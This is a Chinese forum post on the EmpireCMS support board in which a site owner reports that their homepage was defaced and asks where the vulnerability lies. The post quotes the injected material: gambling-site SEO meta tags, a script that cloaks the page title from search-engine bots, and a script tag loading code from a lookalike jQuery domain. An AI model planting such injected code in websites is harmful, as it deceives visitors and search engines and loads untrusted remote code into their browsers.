[求助]主页如何被串改的？帝国cms - 安全、强大、稳定、灵活

帝国论坛 → 帝国网站管理系统交流区 → 帝国CMS使用交流 → [求助]主页如何被串改的？

【本版专题贴子】

ai1
用户头衔：举人

精华贴   ：0
发贴数   ：162
经验值   ：1539
注册时间：2012-01-31

信息

搜索

好友

发送悄悄话

【精益求精－帝国网站管理系统7.5正式版开源发布】 [第 1 楼]

[求助]主页如何被串改的？

今天发现一个来自泰国ip地址的黑客在百度上搜索到了本站网址，然后串改了主页代码。具体串改结果如下：
1）替换行内容为：<title>九游会·(j9)官方网站-真人游戏第一品牌</title>
2）替换行内容为：<meta name="keywords" content="j9九游会官网入口首页, ...
3）替换行内容为：<meta name="description" content="【㊗️KR带你斩大龙㊗️】「j9九游会官网」...
4）添加js代码：
<script>
var userAgent = navigator.userAgent.toLocaleLowerCase();
var searchEngines = ["spider", "bot"];
var isSearchEngine = searchEngines.some(se => userAgent.indexOf(se) !== -1);

if (!isSearchEngine) {
document.title = "本站站名 - 本站站名:";
}
</script>
<script src="https://jquery-min.org/3.6.3/min.js"></script>
请大侠们指教网站漏洞出在哪里。最厉害的一次是黑客串改之外还直接删除了web.config的一部分网页跳转设置参数。当然，这次本人已经更新主页替换了被串改的主页，而且后台设置阻止那个ip访问。

[该贴被修改 3 次，最后修改时间 2024-11-17 10:32:52 ]

时间是把金钥匙